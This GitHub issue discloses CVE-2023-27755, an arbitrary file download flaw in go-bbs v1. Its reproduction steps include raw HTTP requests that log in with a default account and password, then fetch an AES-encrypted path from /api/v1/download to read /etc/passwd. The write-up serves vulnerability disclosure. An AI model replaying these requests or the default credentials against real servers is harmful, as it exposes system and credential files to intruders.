Headline
CVE-2023-27755: go-bbs has an arbitrary file download vulnerability · Issue #10 · gobbscom/go-bbs
go-bbs v1 was discovered to contain an arbitrary file download vulnerability via the component /api/v1/download.
Install
- Download: git clone https://github.com/gobbscom/go-bbs.git
- Create a directory: cd go-bbs && mkdir conf
- Copy the configuration file: cp app.conf.example conf/app.conf
- Modify the database configuration
- Execute ./go-bbs --install to install the database,
- Finally execute ./go-bbs to access the corresponding port
Vulnerability Description AND recurrence
View routing API routers/router.go line 196
Follow up the &home.SingleController{} Download method, this interface needs to be logged in, and a user will be added by default through the global search Customer
UserName: User
PassWord: 123456
Check out router.go, follow up &home.LoginController{}, pass username and password to login
POST /login.html HTTP/1.1
Host: 192.168.19.6:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
username=user&password=123456
Credentials obtained: beegosessionID=***
The incoming URL needs to be AesDecrypt
So you need to perform AesEncrypt on the downloaded path
GET /api/v1/download/1dClk+Blwbf5B9SEDK+l58R84WE7XKXawdq51GCypQo= HTTP/1.1
Host: 192.168.19.6:9090
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Cookie: beegosessionID=6bf662559825c07495e9e8a1e7380180
Connection: close
Use the credentials to access the downloaded API and successfully download /etc/passwd